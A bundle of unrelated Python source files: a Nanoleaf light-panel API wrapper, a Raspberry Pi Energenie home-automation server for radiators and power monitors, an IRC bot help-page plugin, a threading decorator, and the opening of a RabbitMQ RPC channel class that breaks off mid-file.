result = Titlegiver.get_title_from_url(self.URL + "/pages/encoding_xmldecl")
self.assertEqual(result, u"Samoraj - 武家")
def test_encoding_meta_charset(self):
result = Titlegiver.get_title_from_url(
self.URL + "/pages/encoding_meta_charset"
)
self.assertEqual(result, u"Россия-Матушка")
def test_encoding_meta_httpequiv(self):
result = Titlegiver.get_title_from_url(
self.URL + "/pages/encoding_meta_httpequiv"
)
self.assertEqual(result, u"올드보이")
def test_split_strip_and_slice(self):
title = Titlegiver.get_title_from_url(self.URL + "/pages/linebreaks_with_cr")
result = Titlegiver.split_strip_and_slice(title, 2)
self.assertEqual(result, [u"Line1", "Line2"])
|
nanoleaf.py
|
"""nanoleafapi
This module is a Python 3 wrapper for the Nanoleaf OpenAPI.
It provides an easy way to use many of the functions available in the API.
It supports the Light Panels (previously Aurora), Canvas and Shapes (including Hexgaons)."""
import json
from threading import Thread
import colorsys
import os
from typing import Any, List, Dict, Tuple, Union, Callable
from sseclient import SSEClient
import requests
# Preset colours
RED = (255, 0, 0)
ORANGE = (255, 165, 0)
YELLOW = (255, 255, 0)
GREEN = (0, 255, 0)
LIGHT_BLUE = (173, 216, 230)
BLUE = (0, 0, 255)
PINK = (255, 192, 203)
PURPLE = (128, 0, 128)
WHITE = (255, 255, 255)
class Nanoleaf():
"""The Nanoleaf class for controlling the Light Panels and Canvas
:ivar ip: IP of the Nanoleaf device
:ivar url: The base URL for requests
:ivar auth_token: The authentication token for the API
:ivar print_errors: True for errors to be shown, otherwise False
"""
def __init__(self, ip : str, auth_token : str =None, print_errors : bool =False):
"""Initalises Nanoleaf class with desired arguments.
:param ip: The IP address of the Nanoleaf device
:param auth_token: Optional, include Nanoleaf authentication
token here if required.
:param print_errors: Optional, True to show errors in the console
:type ip: str
:type auth_token: str
:type print_errors: bool
"""
self.ip = ip
self.print_errors = print_errors
self.url = "http://" + ip + ":16021/api/v1/" + str(auth_token)
self.check_connection()
if auth_token is None:
self.auth_token = self.create_auth_token()
if self.auth_token is None:
raise NanoleafRegistrationError()
else:
self.auth_token = auth_token
self.url = "http://" + ip + ":16021/api/v1/" + str(self.auth_token)
self.already_registered = False
def __error_check(self, code : int) -> bool:
"""Checks and displays error messages
Determines the request status code and prints the error, if print_errors
is true.
:param code: The error code
:returns: Returns True if request was successful, otherwise False
"""
if self.print_errors:
if code in (200, 204):
print(str(code) + ": Action performed successfully.")
return True
if code == 400:
print("Error 400: Bad request.")
elif code == 401:
print("Error 401: Unauthorized, invalid auth token. " +
"Please generate a new one.")
elif code == 403:
print("Error 403: Unauthorized, please hold the power " +
"button on the controller for 5-7 seconds, then try again.")
elif code == 404:
print("Error 404: Resource not found.")
elif code == 500:
print("Error 500: Internal server error.")
return False
return bool(code in (200, 204))
def create_auth_token(self) -> Union[str, None]:
"""Creates or retrives the device authentication token
The power button on the device should be held for 5-7 seconds, then
this method should be run. This will set both the auth_token and url
instance variables, and save the token in a file for future instances
of the Nanoleaf object.
:returns: Token if successful, None if not.
"""
file_path = os.path.expanduser('~') + os.path.sep + '.nanoleaf_token'
if os.path.exists(file_path) is False:
with open(file_path, 'w'):
pass
with open(file_path, 'r') as token_file:
tokens = token_file.readlines()
for token in tokens:
if token != "":
token = token.rstrip()
response = requests.get("http://" + self.ip + ":16021/api/v1/" + str(token))
if self.__error_check(response.status_code):
return token
response = requests.post('http://' + self.ip + ':16021/api/v1/new')
# process response
if response and response.status_code == 200:
data = json.loads(response.text)
if 'auth_token' in data:
open(file_path, 'a').write("\n" + data['auth_token'])
return data['auth_token']
return None
def delete_auth_token(self, auth_token : str) -> bool:
"""Deletes an authentication token
Deletes an authentication token and the .nanoleaf_token file if it
contains the auth token to delete. This token can no longer be used
as part of an API call to control the device. If required, generate
a new one using create_auth_token().
:param auth_token: The authentication token to delete.
:returns: True if successful, otherwise False
"""
url = "http://" + self.ip + ":16021/api/v1/" + str(auth_token)
response = requests.delete(url)
return self.__error_check(response.status_code)
def check_connection(self) -> None:
"""Ensures there is a valid connection"""
try:
requests.get(self.url, timeout=5)
except Exception as connection_error:
raise NanoleafConnectionError() from connection_error
def get_info(self) -> Dict[str, Any]:
"""Returns a dictionary of device information"""
response = requests.get(self.url)
return json.loads(response.text)
def get_name(self) -> str:
"""Returns the name of the current device"""
return self.get_info()['name']
def get_auth_token(self) -> str:
"""Returns the current auth token"""
return self.auth_token
def get_ids(self) -> List[int]:
"""Returns a list of all device ids"""
position_data = []
device_ids = []
info_data = self.get_info()
if ('panelLayout' in info_data and 'layout' in info_data['panelLayout'] and
'positionData' in info_data['panelLayout']['layout']):
position_data = info_data['panelLayout']['layout']['positionData']
# process position data
for data in position_data:
device_ids.append(data['panelId'])
return device_ids
@staticmethod
def get_custom_base_effect(anim_type : str ='custom', loop : bool =True) -> Dict[str, Any]:
"""Returns base custom effect dictionary"""
base_effect = {
'command': 'display',
'animType': anim_type,
'loop': loop,
'palette': []
}
return base_effect
#######################################################
#### POWER ####
#######################################################
def power_off(self) -> bool:
"""Powers off the lights
:returns: True if successful, otherwise False
"""
data = {"on" : {"value": False}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def power_on(self) -> bool:
"""Powers on the lights
:returns: True if successful, otherwise False
"""
data = {"on" : {"value": True}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def get_power(self) -> bool:
"""Returns the power status of the lights
:returns: True if on, False if off
"""
response = requests.get(self.url + "/state/on")
ans = json.loads(response.text)
return ans['value']
def toggle_power(self) -> bool:
"""Toggles the lights on/off"""
if self.get_power():
return self.power_off()
return self.power_on()
#######################################################
#### COLOUR ####
#######################################################
def set_color(self, r: int, g: int, b: int, br: int =-1) -> bool:
"""Sets the colour of the lights
:param rgb: Tuple in the format (r, g, b)
:returns: True if successful, otherwise False
"""
hsv_colour = colorsys.rgb_to_hsv(r/255, g/255, b/255)
hsv_colour_list = list(hsv_colour)
hsv_colour_list[0] *= 360
hsv_colour_list[1] *= 100
hsv_colour_list[2] *= 100
final_colour = [ int(x) for x in hsv_colour_list ]
if br == -1:
data = {
"hue" : {"value": final_colour[0]},
"sat": {"value": final_colour[1]},
"brightness": {"value": final_colour[2], "duration": 0}
}
else:
data = {
"hue" : {"value": final_colour[0]},
"sat": {"value": final_colour[1]},
"brightness": {"value": br, "duration": 0}
}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
#######################################################
#### ADJUST BRIGHTNESS ####
#######################################################
def set_brightness(self, brightness : int, duration : int =0) -> bool:
"""Sets the brightness of the lights
:param brightness: The required brightness (between 0 and 100)
:param duration: The duration over which to change the brightness
:returns: True if successful, otherwise False
"""
if brightness > 100 or brightness < 0:
raise ValueError('Brightness should be between 0 and 100')
data = {"brightness" : {"value": brightness, "duration": duration}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def increment_brightness(self, brightness : int) -> bool:
"""Increments the brightness of the lights
:param brightness: How much to increment the brightness, can
also be negative
:returns: True if successful, otherwise False
"""
data = {"brightness" : {"increment": brightness}}
response = requests.put(self.url + "/state", data = json.dumps(data))
return self.__error_check(response.status_code)
def get_brightness(self) -> int:
"""Returns the current brightness value of the lights"""
response = requests.get(self.url + "/state/brightness")
ans = json.loads(response.text)
return ans['value']
#######################################################
#### IDENTIFY ####
#######################################################
def identify(self) -> bool:
"""Runs the identify sequence on the lights
:returns: True if successful, otherwise False
"""
response = requests.put(self.url + "/identify")
return self.__error_check(response.status_code)
#######################################################
#### HUE ####
#######################################################
def set_hue(self, value : int) -> bool:
"""Sets the hue of the lights
:param value: The required hue (between 0 and 360)
:returns: True if successful, otherwise False
"""
if value > 360 or value < 0:
raise ValueError('Hue should be between 0 and 360')
data = {"hue" : {"value" : value}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def increment_hue(self, value : int) -> bool:
"""Increments the hue of the lights
:param value: How much to increment the hue, can also be negative
:returns: True if successful, otherwise False
"""
data = {"hue" : {"increment" : value}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def get_hue(self) -> int:
"""Returns the current hue value of the lights"""
response = requests.get(self.url + "/state/hue")
ans = json.loads(response.text)
return ans['value']
#######################################################
#### SATURATION ####
#######################################################
def set_saturation(self, value : int) -> bool:
"""Sets the saturation of the lights
:param value: The required saturation (between 0 and 100)
:returns: True if successful, otherwise False
"""
if value > 100 or value < 0:
raise ValueError('Saturation should be between 0 and 100')
data = {"sat" : {"value" : value}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def increment_saturation(self, value : int) -> bool:
"""Increments the saturation of the lights
:param brightness: How much to increment the saturation, can also be
negative.
:returns: True if successful, otherwise False
"""
data = {"sat" : {"increment" : value}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def get_saturation(self) -> int:
"""Returns the current saturation value of the lights"""
response = requests.get(self.url + "/state/sat")
ans = json.loads(response.text)
return ans['value']
#######################################################
#### COLOUR TEMPERATURE ####
#######################################################
def set_color_temp(self, value : int) -> bool:
"""Sets the white colour temperature of the lights
:param value: The required colour temperature (between 0 and 100)
:returns: True if successful, otherwise False
"""
if value > 6500 or value < 1200:
raise ValueError('Colour temp should be between 1200 and 6500')
data = {"ct" : {"value" : value}}
response = requests.put(self.url + "/state", json.dumps(data))
return self.__error_check(response.status_code)
def increment_color_temp(self, value : int) -> bool:
"""Sets the white colour temperature of the lights
:param value: How much to increment the colour temperature by, can also
be negative.
:returns: True if successful, otherwise False
"""
data = {"ct" : {"increment" : value}}
response = requests.put(self.url + "/state", json.dumps(data))
return self.__error_check(response.status_code)
def get_color_temp(self) -> int:
"""Returns the current colour temperature of the lights"""
response = requests.get(self.url + "/state/ct")
ans = json.loads(response.text)
return ans['value']
#######################################################
#### COLOUR MODE ####
#######################################################
def get_color_mode(self) -> str:
"""Returns the colour mode of the lights"""
response = requests.get(self.url + "/state/colorMode")
return json.loads(response.text)
#######################################################
#### EFFECTS ####
#######################################################
def get_current_effect(self) -> str:
"""Returns the currently selected effect
If the name of the effect isn't available, this will return
*Solid*, *Dynamic* or *Static* instead.
:returns: Name of the effect or type if unavailable.
"""
response = requests.get(self.url + "/effects/select")
return json.loads(response.text)
def set_effect(self, effect_name : str) -> bool:
"""Sets the effect of the lights
:param effect_name: The name of the effect
:returns: True if successful, otherwise False
"""
data = {"select": effect_name}
response = requests.put(self.url + "/effects", data=json.dumps(data))
return self.__error_check(response.status_code)
def list_effects(self) -> List[str]:
"""Returns a list of available effects"""
response = requests.get(self.url + "/effects/effectsList")
return json.loads(response.text)
def write_effect(self, effect_dict : Dict['str', Any]) -> bool:
"""Writes a user-defined effect to the panels
:param effect_dict: The effect dictionary in the format
described here: https://forum.nanoleaf.me/docs/openapi#_u2t4jzmkp8nt
:raises NanoleafEffectCreationError: When invalid effect dictionary is provided.
:returns: True if successful, otherwise False
"""
response = requests.put(self.url + "/effects", data=json.dumps({"write": effect_dict}))
if response.status_code == 400:
raise NanoleafEffectCreationError("Invalid effect dictionary")
return self.__error_check(response.status_code)
def effect_exists(self, effect_name : str) -> bool:
"""Verifies whether an effect exists
:param effect_name: Name of the effect to verify
:returns: True if effect exists, otherwise False
"""
response = requests.get(self.url + "/effects/effectsList")
if effect_name in json.loads(response.text):
return True
return False
def pulsate(self, rgb : Tuple[int, int, int], speed : float = 1) -> bool:
"""Displays a pulsating effect on the device with two colours
:param rgb: A tuple containing the RGB colour to pulsate in the format (r, g, b).
:param speed: The speed of the transition between colours in seconds,
with a maximum of 1 decimal place.
:raises NanoleafEffectCreationError: When an invalid rgb value is provided.
:returns: True if the effect was created and displayed successfully, otherwise False
"""
if len(rgb) != 3:
raise NanoleafEffectCreationError("There must be three values in the " +
"RGB tuple! E.g., (255, 0, 0)")
for colour in rgb:
if not isinstance(colour, int):
raise NanoleafEffectCreationError("All values in the tuple must be " +
"integers! E.g., (255, 0, 0)")
if colour < 0 or colour > 255:
raise NanoleafEffectCreationError("All values in the tuple must be " +
"integers between 0 and 255! E.g., (255, 0, 0)")
base_effect = self.get_custom_base_effect()
ids = self.get_ids()
anim_data = str(len(ids))
frame_string = ""
for device_id in ids:
frame_string += " {id} 2".format(id=device_id)
r, g, b = rgb[0], rgb[1], rgb[2]
frame_string += " {r} {g} {b} 0 {speed} 0 0 0 0 {speed_2}".format(
r=r, g=g, b=b, speed=int(speed*10), speed_2=int(speed*10))
base_effect['animData'] = anim_data + frame_string
return self.write_effect(base_effect)
def flow(self, rgb_list : List[Tuple[int, int, int]], speed : float = 1) -> bool:
"""Displays a sequence of specified colours on the device.
:param rgb: A list of tuples containing RGB colours to flow between in the format (r, g, b).
:param speed: The speed of the transition between colours in seconds, with a maximum of
1 decimal place.
:raises NanoleafEffectCreationError: When an invalid rgb_list is provided.
:returns: True if the effect was created and displayed successfully, otherwise False
"""
if len(rgb_list) <= 1:
raise NanoleafEffectCreationError("There has to be more than one tuple in " +
"the RGB list for this effect! E.g., [(255, 0, 0), (0, 0, 0)]")
for tup in rgb_list:
if len(tup) != 3:
raise NanoleafEffectCreationError("There must be three values in the " +
"RGB tuple! E.g., (255, 0, 0)")
for colour in tup:
if not isinstance(colour, int):
raise NanoleafEffectCreationError("All values in the tuple must " +
"be integers! E.g., (255, 0, 0)")
if colour < 0 or colour > 255:
raise NanoleafEffectCreationError("All values in the tuple must " +
"be integers between 0 and 255! E.g., (255, 0, 0)")
base_effect = self.get_custom_base_effect()
ids = self.get_ids()
anim_data = str(len(ids))
frame_string = ""
for device_id in ids:
frame_string += " {id} {numFrames}".format(id=device_id, numFrames=len(rgb_list))
for rgb in rgb_list:
r, g, b = rgb[0], rgb[1], rgb[2]
frame_string += " {r} {g} {b} 0 {speed}".format(r=r, g=g, b=b, speed=int(speed*10))
base_effect['animData'] = anim_data + frame_string
return self.write_effect(base_effect)
def spectrum(self, speed : float = 1) -> bool:
"""Displays a spectrum cycling effect on the device
:param speed: The speed of the transition between colours in seconds,
with a maximum of 1 decimal place.
:returns: True if the effect was created and displayed successfully,
otherwise False
"""
base_effect = self.get_custom_base_effect()
ids = self.get_ids()
spectrum_palette = []
for hue in range(0, 360, 10):
(r, g, b) = colorsys.hsv_to_rgb(hue/360, 1.0, 1.0)
spectrum_palette.append((int(255*r), int(255*g), int(255*b)))
anim_data = str(len(ids))
frame_string = ""
for device_id in ids:
frame_string += " {id} {numFrames}".format(id=device_id,
numFrames=len(spectrum_palette))
for rgb in spectrum_palette:
r, g, b = rgb[0], rgb[1], rgb[2]
frame_string += " {r} {g} {b} 0 {speed}".format(r=r, g=g, b=b, speed=int(speed*10))
base_effect['animData'] = anim_data + frame_string
return self.write_effect(base_effect)
#######################################################
#### LAYOUT ####
#######################################################
def get_layout(self) -> Dict[str, Any]:
"""Returns the device layout information"""
response = requests.get(self.url + "/panelLayout/layout")
return json.loads(response.text)
#######################################################
#### EVENTS ####
#######################################################
def register_event(self, func : Callable[[Dict[str, Any]], Any],
event_types : List[int]) -> None:
"""Starts a thread to register and listen for events
Creates an event listener. This method can only be called once per
program run due to API limitations.
:param func: The function to run when an event is recieved (this
should be defined by the user with one argument). This function
will recieve the event as a dictionary.
:param event_types: A list containing up to 4 numbers from
1-4 corresponding to the relevant events to be registered for.
1 = state (power/brightness),
2 = layout,
3 = effects,
4 = touch (Canvas only)
"""
if self.already_registered:
print("Cannot register events more than once.")
return
if len(event_types) > 4 or len(event_types) < 1:
raise Exception("The number of events to register for must be" +
"between 1-4")
for event in event_types:
if event < 1 or event > 4:
raise Exception("Valid event types must be between 1-4")
self.already_registered = True
thread = Thread(target=self.__event_listener, args=(func, set(event_types)))
thread.daemon = True
thread.start()
def __event_listener(self, func : Callable[[Dict[str, Any]], Any],
event_types : List[int]) -> None:
"""Listens for events and passes event data to the user-defined
function."""
url = self.url + "/events?id="
for event in event_types:
url += str(event) + ","
client = SSEClient(url[:-1])
for event in client:
func(json.loads(str(event)))
#######################################################
#### ERRORS ####
#######################################################
class NanoleafRegistrationError(Exception):
"""Raised when an issue during device registration."""
def __init__(self) -> None:
message = """Authentication token generation failed. Hold the power
button on your Nanoleaf device for 5-7 seconds and try again."""
super().__init__(message)
class NanoleafConnectionError(Exception):
"""Raised when the connection to the Nanoleaf device fails."""
def __init__(self) -> None:
message = "Connection to Nanoleaf device failed. Is this the correct IP?"
super().__init__(message)
class NanoleafEffectCreationError(Exception):
"""Raised when one of the custom effects creation has incorrect arguments."""
|
tab_pyenergenie_server2.py
|
#!/usr/bin/python
import time
import energenie
import sys
import os
import threading
import RPi.GPIO as GPIO
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from httplib2 import Http
import traceback
from energenie import OpenThings
from energenie import Devices
class PIRCallback:
def __init__(self,sensor):
self.sensor=sensor
def onMotion(self,sensor,on):
if on:
http_obj = Http( disable_ssl_certificate_validation=True )
resp, content = http_obj.request(
uri="https://192.168.1.1:8443/polestar/scripts/webhook/90697B320A017A92",
method='POST',
body=self.sensor
)
class Radiator:
def __init__(self,radiator,name):
self.radiator=radiator
self.name=name
def get_ambient_temperature(self):
t=self.radiator.get_ambient_temperature()
if t==None:
t=0.0
return t
def get_battery_voltage(self):
v=self.radiator.get_battery_voltage()
if v==None:
v=0.0
return v
def get_diagnostics(self):
d=self.radiator.get_diagnostics()
if d==None:
d=-1
return d
def toXMLString(self):
try:
now=time.time()
return "<{} temp='{:.2f}' voltage='{:.2f}' diag='{}' age='{:.0f}'/>".format(
self.name,
self.get_ambient_temperature(),
self.get_battery_voltage(),
self.get_diagnostics(),
now-self.radiator.lastHandledMessage,
)
except:
print traceback.print_exc()
return "<{}/>".format(self.name);
class EnergyMonitor:
def __init__(self,monitor,name,
dutyCycleThreshold=100,
averageSamples=360, # 60 mins
dutyCycleFilterFactor=0.5
):
self.name=name
self.dutyCycleThreshold=dutyCycleThreshold
self.powerReadingsSize=averageSamples
self.dutyCycleFilterFactor=dutyCycleFilterFactor
self.monitor=monitor
self.powerReadings = [-1 for i in range(0,self.powerReadingsSize)]
self.powerReadingsIndex=0
self.avgPower=0.0;
self.dutyCycle=0.0
self.dutyCycle2=-1
self.lastTransitionTime=None;
self.lastPowerAboveDuty=None;
self.lastDurationBelow=None;
self.lastDurationAbove=None;
def poll(self):
realPower=self.monitor.get_readings().real_power
self.powerReadings[self.powerReadingsIndex]=realPower
self.powerReadingsIndex=(self.powerReadingsIndex+1)%self.powerReadingsSize
#calculate duty cycle
powerAboveDuty=realPower>self.dutyCycleThreshold
if self.lastPowerAboveDuty!=None:
now=time.time()
if powerAboveDuty!=self.lastPowerAboveDuty:
if self.lastTransitionTime!=None:
if powerAboveDuty:
self.lastDurationBelow=now-self.lastTransitionTime
else:
self.lastDurationAbove=now-self.lastTransitionTime
self.lastTransitionTime=now
if self.lastDurationBelow!=None and self.lastDurationAbove!=None:
self.updateDuty()
# enhancement to more rapidly adapt to changes in duty
if self.lastDurationBelow!=None and self.lastDurationAbove!=None:
duration=now-self.lastTransitionTime
if powerAboveDuty and duration>self.lastDurationAbove:
self.lastDurationAbove=duration
self.updateDuty()
if (not powerAboveDuty) and duration>self.lastDurationBelow:
self.lastDurationBelow=duration
self.updateDuty()
self.lastPowerAboveDuty=powerAboveDuty
def updateDuty(self):
dutyCycle=float(self.lastDurationAbove)/float(self.lastDurationAbove+self.lastDurationBelow)
if self.dutyCycle2<0:
self.dutyCycle2=dutyCycle
else:
self.dutyCycle2=dutyCycle*self.dutyCycleFilterFactor+self.dutyCycle2*(1-self.dutyCycleFilterFactor)
def updateAverage(self):
totalPower=0.0
count=0
heaterOn=0.0
for power in self.powerReadings:
if power>=0:
totalPower+=power
count=count+1
if power>self.dutyCycleThreshold:
heaterOn=heaterOn+1.0
if count>0:
self.avgPower=totalPower/float(count)
self.dutyCycle=heaterOn/float(count)
def toXMLString(self):
try:
productId=self.monitor.product_id
if productId==Devices.PRODUCTID_MIHO005:
extra="switchState='{}'".format(self.monitor.is_on());
else:
extra=""
now=time.time()
return "<{} power='{}' avgPower='{:.2f}' dutyCycle='{:.2f}' dutyCycle2='{:.2f}' volt='{}' freq='{:.2f}' age='{:.0f}' {}/>".format(
self.name,
self.monitor.get_readings().real_power,
self.avgPower,
self.dutyCycle,
self.dutyCycle2,
self.monitor.get_voltage(),
self.monitor.get_frequency(),
now-self.monitor.lastHandledMessage,
extra
)
except:
print traceback.print_exc()
return "<{}/>".format(self.name);
class Main:
def __init__(self,energenie):
self.energenie=energenie
self.kitchenPIR = energenie.registry.get("MIHO032_kitchen");
self.kitchenPIR.setCallback(PIRCallback("urn:motion:energenie1").onMotion)
self.loungePIR = energenie.registry.get("MIHO032_lounge");
self.loungePIR.setCallback(PIRCallback("urn:motion:energenie2").onMotion)
self.rad1 = Radiator(energenie.registry.get("MIHO013_rad1"),"MIHO013_rad1")
self.rad2 = Radiator(energenie.registry.get("MIHO013_rad2"),"MIHO013_rad2")
self.rad3 = Radiator(energenie.registry.get("MIHO013_rad3"),"MIHO013_rad3")
self.rad4 = Radiator(energenie.registry.get("MIHO013_rad4"),"MIHO013_rad4")
self.aquarium = EnergyMonitor(energenie.registry.get("MIHO004_aquarium"),"MIHO004_aquarium")
self.deskLight = EnergyMonitor(energenie.registry.get("MIHO004_desklamp"),"MIHO004_fridge",
dutyCycleThreshold=40, averageSamples=1440) # 4 hours
self.freezer = EnergyMonitor(energenie.registry.get("MIHO004_freezer"),"MIHO004_freezer",
dutyCycleThreshold=50, averageSamples=1440) # 4hours
#self.miho005 = EnergyMonitor(energenie.registry.get("MIHO005_something"),"MIHO005_something",
# dutyCycleThreshold=20)
def loop(self):
print "sleeping to allowing readings first"
self.energenie.loop(receive_time=10)
print "ok looping"
global stopEnergenie
lastTime=time.time()
while not(stopEnergenie):
self.energenie.loop(receive_time=10)
now=time.time()
if now-lastTime>=10:
lastTime=now
self.aquarium.poll()
self.deskLight.poll()
self.freezer.poll()
#self.miho005.poll()
stopEnergenie=False
def getData(self):
self.aquarium.updateAverage()
self.deskLight.updateAverage()
self.freezer.updateAverage()
data="<data>"
data+=self.deskLight.toXMLString()
data+=self.aquarium.toXMLString()
data+=self.freezer.toXMLString()
#data+=self.miho005.toXMLString()
data+=self.rad1.toXMLString()
data+=self.rad2.toXMLString()
data+=self.rad3.toXMLString()
data+=self.rad4.toXMLString()
data+="</data>"
return data
def getRadiator(self,radNum):
if radNum=="1":
rad=self.rad1.radiator
elif radNum=="2":
rad=self.rad2.radiator
elif radNum=="3":
rad=self.rad3.radiator
elif radNum=="4":
rad=self.rad4.radiator
else:
rad=None
return rad
def onSetRadiator(self,radNum, temp):
rad=self.getRadiator(radNum)
if rad!=None:
rad.enable_thermostat()
rad.set_setpoint_temperature(temp)
return "<div>setRadiator {:s} {:f}</div>".format(rad,temp)
def onSetRadiatorValve(self,radNum, onOff):
rad=self.getRadiator(radNum)
if rad!=None:
if onOff=="on":
rad.turn_on()
elif onOff=="off":
rad.turn_off()
elif onOff=="thermostatic":
rad.enable_thermostat()
elif onOff=="identify":
rad.set_identify()
return "<div>setRadiatorValve {:s} {:s}</div>".format(rad,onOff)
def setLegacySwitch(self,house, device, onOff):
print house, device, onOff
socket = energenie.Devices.ENER002((house, device))
if (onOff=='on'):
socket.turn_on()
else:
socket.turn_off()
return "<div>setLegacySwitch {} {} {}</div>".format(house,device,onOff)
class HTTPHandler(BaseHTTPRequestHandler):
global m
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/xml')
self.end_headers()
self.wfile.write(self.onGet(self.path));
def do_HEAD(self):
self._set_headers()
def do_POST(self):
# Doesn't do anything with posted data
self._set_headers()
self.wfile.write("<html><body><h1>POST!</h1></body></html>")
def onGet( self, path ):
if (path=="/data"):
#sys.exit(0)
result=m.getData()
elif path.startswith("/setRadiator/"):
tokens=path.split("/")
result=m.onSetRadiator(tokens[2],float(tokens[3]))
elif path.startswith("/setRadiatorValve/"):
tokens=path.split("/")
result=m.onSetRadiatorValve(tokens[2],tokens[3])
elif path.startswith("/setLegacySwitch/"):
tokens=path.split("/")
result=m.setLegacySwitch(int(tokens[2]),int(tokens[3]),tokens[4])
else:
result="<html><body><h1>{0}</h1></body></html>".format(path)
return result;
def cleanupGPIO():
GPIO.setmode(GPIO.BCM)
GPIO.setup(27, GPIO.IN) # Green LED
GPIO.setup(22, GPIO.IN) # Red LED
GPIO.setup(7, GPIO.IN) # CS
GPIO.setup(8, GPIO.IN) # CS
GPIO.setup(11, GPIO.IN) # SCLK
GPIO.setup(10, GPIO.IN) # MOSI
GPIO.setup(9, GPIO.IN) # MISO
GPIO.setup(25, GPIO.IN) # RESET
GPIO.cleanup()
try:
stopEnergenie=False
scriptDir=os.path.dirname(os.path.realpath(sys.argv[0]))
os.chdir(scriptDir)
energenie.init()
m=Main(energenie)
p = threading.Thread(target=m.loop)
p.daemon = True
p.start()
httpd = HTTPServer(('', 8082), HTTPHandler)
print 'Starting httpd...'
httpd.serve_forever()
except:
stopEnergenie=True
print traceback.print_exc()
raise
finally:
stopEnergenie=True
c=0
while c<10:
time.sleep(0.25)
c=c+1
energenie.finished()
cleanupGPIO()
print "finished"
|
help.py
|
"""Provide help information."""
import collections
import http.server
import threading
import jinja2
def register(bot):
threading.Thread(target=help_server, args=(bot,), daemon=True).start()
bot.listen(r'^help$', help, require_mention=True)
bot.listen(r'^macros$', help_macro, require_mention=True)
def help(bot, msg):
"""Provide a link to this help page."""
msg.respond('https://ircbot.ocf.berkeley.edu/')
def help_macro(bot, msg):
"""Provide a link to the list of macros."""
msg.respond('https://ircbot.ocf.berkeley.edu/macros')
def build_request_handler(bot):
jinja_env = jinja2.Environment(
loader=jinja2.PackageLoader('ircbot', ''),
autoescape=True,
)
class RequestHandler(http.server.BaseHTTPRequestHandler):
def render_response(self, template, **context):
rendered = jinja_env.get_template(template).render(**context).encode('utf-8')
self.send_response(200, 'Okay')
self.send_header('Content-Length', len(rendered))
self.send_header('Content-Type', 'text/html; charset=utf-8')
self.end_headers()
self.wfile.write(rendered)
def do_GET(self):
if self.path == '/':
plugins = collections.defaultdict(set)
for listener in bot.listeners:
plugins[bot.plugins[listener.fn.__module__]].add(listener)
self.render_response(
'plugin/templates/help.html',
plugins=sorted(plugins.items(), key=lambda p: p[0].__name__),
)
elif self.path == '/macros':
self.render_response(
'plugin/templates/macros.html',
macros=bot.plugins['macros'].list(bot),
)
else:
self.send_response(404, 'File not found')
self.end_headers()
self.wfile.write(b'404 File not found')
return RequestHandler
def help_server(bot):
server = http.server.HTTPServer(('0.0.0.0', 8888), build_request_handler(bot))
server.serve_forever()
|
decorators.py
|
from threading import Thread
def async(f):
def wrapper(*args, **kwargs):
thr = Thread(target = f, args = args, kwargs = kwargs)
thr.start()
return wrapper
|
rpc_channel.py
|
# Copyright (c) 2019 Platform9 Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import pika
import threading
import datetime
import time
import re
from shared.constants import LOGGER_PREFIX
LOG = logging.getLogger(LOGGER_PREFIX + __name__)
class RpcChannel(object):
def __init__(self,
host,
port,
user,
password,
exchange,
exchange_type,
virtual_host="/",
application='',
connection_ready_callback=None,
connection_close_callback=None):
self._host = host
self._port = port
self._user = user
self._password = password
self._exchange = exchange
self._exchange_type = exchange_type
self._virtual_host = virtual_host
self._application = str(application)
self._connection = None
self._channel = None
self._stopping = False
self._credentials = pika.PlainCredentials(username=self._user,
password=self._password)
self._connection_parameters = pika.ConnectionParameters(host=self._host,
port=int(
self._port),
virtual_host=self._virtual_host,
credentials=self._credentials)
self._closing = False
self._connection_ready = False
# the default settings used when declare exchange:
# exchange_type='direct',
# passive=False,
# durable=False,
# auto_delete=False,
# amount them, the 'aut_delete' may have different value on rabbitmq
# so need to handle it when exchange declaration failed
self._exchange_auto_delete = False
# callbacks
self._connection_ready_callback = None
self._connection_close_callback = None
if connection_ready_callback and callable(connection_ready_callback):
self._connection_ready_callback = connection_ready_callback
if connection_close_callback and callable(connection_close_callback):
self._connection_close_callback = connection_close_callback
def _open_connection(self):
LOG.debug('create RPC pika connecting to amqp://password:%s@%s:%s/ for %s', self._user,
self._host, str(self._port), self._application)
return pika.SelectConnection(self._connection_parameters,
on_open_callback=self._on_connection_open,
on_open_error_callback=self._on_connection_open_fault,
on_close_callback=self._on_connection_closed)
def _close_connection(self):
LOG.debug('closing RPC pika connection for %s', self._application)
self._closing = True
if self._connection is not None:
self._connection.close()
def _on_connection_open_fault(self, _unused_connection, err):
LOG.debug('error when open RPC pika connection for %s, will reopen : %s',
self._application, str(err))
time.sleep(5)
if self._connection:
self._connection.ioloop.stop()
def _on_connection_closed(self, connection, reply_code, reply_text):
LOG.debug('RPC pika connection was closed for %s', self._application)
if self._closing:
LOG.debug('stop RPC pika ioloop for %s since connection was closed.', self._application)
self._connection.ioloop.stop()
else:
time.sleep(5)
LOG.debug('RPC pika connection for %s was closed, will reopen. error : %s %s',
self._application, reply_code, reply_text)
self.close_channel()
self._connection.ioloop.stop()
def _on_connection_open(self, unused_connection):
LOG.debug('RPC pika connection opened for %s', self._application)
self._open_channel()
def _open_channel(self):
LOG.debug('creating RPC pika channel for %s', self._application)
self._connection.channel(on_open_callback=self._on_channel_open)
def close_channel(self):
